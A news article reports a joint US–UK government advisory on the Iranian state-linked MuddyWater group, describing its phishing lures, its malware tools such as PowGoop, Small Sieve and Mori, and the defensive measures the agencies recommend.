Cybersecurity agents from the U.K. as well as the U.S. revealed a new malware that was used in attacks against government networks and commercial networks around the world by an Iranian government-sponsored, advanced persistent threat group (APT).
“MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors,” the agencies said.
The joint advisory comes courtesy of the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the U.K.’s National Cyber Security Centre (NCSC).
This year, cyberspionage actors were exposed as carrying out malicious operations in Iran’s Ministry of Intelligence and Security. They targeted a broad range of public and private sector organizations including defense and telecommunications.
MuddyWater is also tracked by the wider cybersecurity community under the names Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, with the group known for cyber offensives in support of MOIS objectives since roughly 2018.
In addition to exploiting public vulnerabilities, this group was historically seen using open-source tools for sensitive data access, ransomware deployment, and persistence on victim networks.
A follow-on investigation by Cisco Talos late last month also uncovered a previously undocumented malware campaign aimed at Turkish private organizations and governmental institutions with the goal of deploying a PowerShell-based backdoor.
The new activities unmasked by the intelligence authorities are no different in that they make use of obfuscated PowerShell scripts to conceal the most damaging parts of the attacks, including command-and-control (C2) functions.
The intrusions are facilitated via a spear-phishing campaign that attempts to coax its targets into downloading suspicious ZIP archives that either contain an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious payload to the infected system.
“Additionally the group uses multiple malware set — PowGoop Small Sieve Canopy/Starwhale Mori and POWERSTATS — to load malware, backdoor acces, persistence and exfiltration,” FBI CISA, CNMF and NCSC stated.
While PowGoop functions as a loader responsible for downloading second-stage PowerShell scripts, Small Sieve is described as a Python-based implant used for maintaining foothold in the network by leveraging the Telegram API for C2 communications to evade detection.
Other key pieces of malware are Canopy, a Windows Script File (.WSF) used to collect and transmit system metadata to an adversary-controlled IP address, and two backdoors called Mori and POWERSTATS that are used to run commands received from the C2 and maintain persistent access.
On top of that, MuddyWater has employed a survey script to enumerate information about victim computers, which is then sent back to the remote C2 server. A PowerShell backdoor, which has been identified and deployed by MuddyWater, is used to execute the commands sent from attackers.
To create barriers for potential attacks, the agencies are recommending organizations to use multi-factor authentication wherever applicable, limit the use of administrator privileges, implement phishing protections, and prioritize patching known exploited vulnerabilities.